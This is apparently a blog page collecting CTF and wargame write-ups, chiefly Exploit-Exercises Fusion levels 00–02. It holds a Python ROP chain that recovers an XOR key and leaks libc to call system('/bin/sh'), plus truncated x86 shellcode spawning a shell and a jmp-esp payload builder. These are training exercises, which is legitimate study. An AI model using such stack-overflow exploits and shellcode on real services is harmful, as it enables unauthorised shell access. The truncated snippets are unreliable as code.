
[Exploit-Exercise] Fusion level02

Fusion Level02
- There is XOR encryption with a random value. First get the XOR table.
- After that it is just ROP: leak the address of write() and get the address of system() from the libc offset.
- I just use system(). There is another way to get a shell: execve(). Using execve() would be cleaner and more comfortable for building the payload.
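The two steps the summary describes (recover the XOR table with known plaintext, then leak write() and derive system() by offset) as an added, self-contained walk-through. This is example code written for this page, not the write-up's exploit: the XorEchoService class is a constructed stand-in for the target (a random per-connection key applied in place and echoed back, key length 128 assumed), and every address and offset (WRITE_PLT, GOT_WRITE, RET_AFTER, the libc offsets, the 140-byte distance to the saved EIP, the fd value and the leaked value) is a placeholder to be replaced with values read from the real binary and its libc.

```python
import os
import struct


def p32(v):
    return struct.pack("<I", v)


def u32(b):
    return struct.unpack("<I", b[:4])[0]


def xor_bytes(data, key):
    """XOR data against a repeating key (the key wraps if data is longer)."""
    return bytes(c ^ key[i % len(key)] for i, c in enumerate(data))


class XorEchoService:
    """Constructed stand-in for the target, not the real level02 code: each
    connection gets a fresh random key, everything the client sends is XORed
    with it in place, and the XORed bytes are echoed back to the client."""

    KEY_LEN = 128  # assumed table length for the simulation; check the real binary

    def __init__(self, key=None):
        self.key = key if key is not None else os.urandom(self.KEY_LEN)

    def handle(self, wire):
        return xor_bytes(wire, self.key)  # this is what ends up in the server's buffer


def recover_xor_table(echo, length):
    """Known-plaintext trick: zeros XOR key == key, so one echo of zeros returns the table."""
    return echo(b"\x00" * length)


def encode_for_wire(payload, key):
    """Pre-XOR the payload so the server's own XOR pass restores it byte for byte."""
    return xor_bytes(payload, key)


# Hypothetical addresses and offsets. Take the real ones from the target binary
# (objdump -d / readelf -r) and its libc (readelf -s libc.so.6).
WRITE_PLT = 0x08048600
GOT_WRITE = 0x0804A010
RET_AFTER = 0x08048700  # known fixed address that re-enters the vulnerable read
WRITE_OFFSET = 0x000D43C0
SYSTEM_OFFSET = 0x0003ADA0
BINSH_OFFSET = 0x0015BA0B


def build_leak_chain(ret_offset, fd):
    """Stage 1: write(fd, &GOT[write], 4) sends the resolved libc address of write()
    back over the socket. fd must be the client socket, not stdout."""
    return (b"A" * ret_offset + p32(WRITE_PLT) + p32(RET_AFTER)
            + p32(fd) + p32(GOT_WRITE) + p32(4))


def resolve_system(leaked_write):
    """Stage 2 arithmetic: libc base from the leak, then system() and "/bin/sh" by offset."""
    libc_base = leaked_write - WRITE_OFFSET
    return libc_base + SYSTEM_OFFSET, libc_base + BINSH_OFFSET


def build_system_chain(ret_offset, system_addr, binsh_addr):
    """Stage 2 chain: saved EIP -> system(), a dummy return address, then the argument."""
    return b"A" * ret_offset + p32(system_addr) + p32(0xDEADBEEF) + p32(binsh_addr)


def demo(ret_offset=140, fd=4):
    """Walk both stages against the simulated service; returns True if the chain that
    lands in the server buffer is exactly the chain we intended."""
    svc = XorEchoService()
    key = recover_xor_table(svc.handle, XorEchoService.KEY_LEN)
    stage1 = svc.handle(encode_for_wire(build_leak_chain(ret_offset, fd), key))
    assert stage1 == build_leak_chain(ret_offset, fd)
    leaked_write = u32(p32(0xF7E9A3C0))  # constructed leak; a real run reads 4 bytes from the socket
    system_addr, binsh_addr = resolve_system(leaked_write)
    chain = build_system_chain(ret_offset, system_addr, binsh_addr)
    return svc.handle(encode_for_wire(chain, key)) == chain


if __name__ == "__main__":
    print("chain survives the XOR layer:", demo())
```

Two things to verify on the real target before reusing this: whether the XOR is applied over the whole received length (if it stops short, only the covered bytes need pre-XORing), and whether the key really repeats with the period you assume; a wrong period corrupts the return address silently. The "/bin/sh" pointer is taken from libc here because, with ASLR on, the stack is not a dependable place for the string.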
[Exploit-Exercise] Fusion level01

Fusion Level01
- NX is still disabled, but ASLR is on.
- Now we can't take the buffer address from the binary.
- All you need is a 'jmp esp' gadget.

from pwn import *

# dup2(0, 0) + dup2(0, 1) + dup2(0, 2) + execute /bin/sh
sc = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x..
[Exploit-Exercise] Fusion level00

Fusion Level00
- There aren't any memory protections, not even NX, so I just use shellcode.
- The service listens on port 20000, and be careful with the 'fd'.
- In fix_path() there is a stack buffer overflow vulnerability.
- RET -> bytes 140 ~ 143

from pwn import *

# dup2(0, 0) + dup2(0, 1) + dup2(0, 2) + execute /bin/sh
sc = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\..
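Why a 'jmp esp' gadget is enough once ASLR is on (level01) while level00 could jump straight to the buffer: ASLR moves the stack and the libraries, but a non-PIE main binary stays at its fixed load address, so a 'jmp esp' found inside it is a stable pivot to wherever the stack happens to be. The following added example (written for this page, not taken from either write-up) parses the program headers of a 32-bit ELF, reports every 'jmp esp' (ff e4) in an executable PT_LOAD segment, and lays the payload out as padding, gadget address, shellcode. The ELF image it scans is a constructed 150-byte stand-in, not a real program, and the 140-byte return-address offset is the level00 value reused as a placeholder; measure it for your own target. The four int3 bytes stand in for real shellcode.

```python
import struct

ELF_MAGIC = b"\x7fELF"
ET_EXEC = 2
PT_LOAD = 1
PF_X = 1
JMP_ESP = b"\xff\xe4"  # x86 encoding of `jmp esp`


def find_jmp_esp(elf):
    """Return the virtual address of every `jmp esp` found inside an executable
    PT_LOAD segment of a 32-bit little-endian, non-PIE ELF image."""
    if elf[:4] != ELF_MAGIC or elf[4] != 1 or elf[5] != 1:
        raise ValueError("expected a 32-bit little-endian ELF")
    hdr = struct.unpack_from("<16sHHIIIIIHHHHHH", elf, 0)
    if hdr[1] != ET_EXEC:
        raise ValueError("not ET_EXEC: a PIE gets relocated by ASLR, so its gadget addresses are not fixed")
    e_phoff, e_phentsize, e_phnum = hdr[5], hdr[9], hdr[10]
    hits = []
    for i in range(e_phnum):
        (p_type, p_offset, p_vaddr, _paddr, p_filesz,
         _memsz, p_flags, _align) = struct.unpack_from("<8I", elf, e_phoff + i * e_phentsize)
        # Only executable segments: with NX off a gadget in .data would also run,
        # but restricting to PF_X keeps the result valid if NX is ever enabled.
        if p_type != PT_LOAD or not (p_flags & PF_X):
            continue
        seg = elf[p_offset:p_offset + p_filesz]
        pos = seg.find(JMP_ESP)
        while pos != -1:
            hits.append(p_vaddr + pos)
            pos = seg.find(JMP_ESP, pos + 1)
    return hits


def build_jmp_esp_payload(ret_offset, jmp_esp_addr, shellcode):
    """Saved EIP -> `jmp esp`. After `ret` pops that slot, esp points at the bytes that
    follow it in the same buffer, so the shellcode goes directly behind the address."""
    return b"A" * ret_offset + struct.pack("<I", jmp_esp_addr) + shellcode


def make_sample_elf():
    """Constructed 150-byte ELF image (not a real program): one RX segment with a
    `jmp esp` at 0x08048083 and one RW segment that also holds ff e4 and must be ignored."""
    text = b"\x55\x89\xe5\xff\xe4\xc3"   # push ebp; mov ebp, esp; jmp esp; ret
    data = b"\x00\x00\x00\x00\xff\xe4"   # same bytes in a non-executable segment
    ehdr = struct.pack("<16sHHIIIIIHHHHHH",
                       b"\x7fELF\x01\x01\x01" + b"\x00" * 9,
                       ET_EXEC, 3, 1, 0x08048080, 52, 0, 0, 52, 32, 2, 40, 0, 0)
    ph_text = struct.pack("<8I", PT_LOAD, 0x00, 0x08048000, 0x08048000, 0x90, 0x90, 5, 0x1000)
    ph_data = struct.pack("<8I", PT_LOAD, 0x90, 0x08049090, 0x08049090, 0x06, 0x06, 6, 0x1000)
    image = ehdr + ph_text + ph_data
    image += b"\x00" * (0x80 - len(image)) + text
    image += b"\x00" * (0x90 - len(image)) + data
    return image


if __name__ == "__main__":
    gadgets = find_jmp_esp(make_sample_elf())
    print("jmp esp at", [hex(a) for a in gadgets])
    # 140 is the saved-EIP offset from the level00 write-up, used here as a placeholder.
    payload = build_jmp_esp_payload(140, gadgets[0], b"\xcc" * 4)  # int3 x4: shellcode stand-in
    print("payload length", len(payload))
```

On a real target, pass the binary's bytes (open(path, "rb").read()) to find_jmp_esp; ROPgadget or objdump give the same answer, but seeing the PF_X filter spelled out makes clear why a hit reported from a writable data segment is not something to rely on.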
[Codegate 2016] reversing : compress

compress
This problem just gave us an encrypted string and the Python code that encodes it.

import md5

def encode(input_string):
    print "Input : %s" % input_string
    h = md5.md5(input_string[:4]).hexdigest()
    table = { 'a': 1, 'b': 2, 'c': 3, 'd': 4, 'e': 5, 'f': 6, 'g': 7, 'h': 8, 'i': 9, 'j': 0 }
    out = ""
    prev = ""
    stage1 =..
[Plaid 2014] pwnable : tenement & sass

These write-ups don't include any exploit code, just EIP control.

tenement
The given binary 'tenement' is an x86 stripped ELF file, too.

zero@ubuntu:~/Desktop/ctf/plaid2014$ file tenement
tenement: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, stripped

And the applied memory protections are...

zero@ubuntu:~..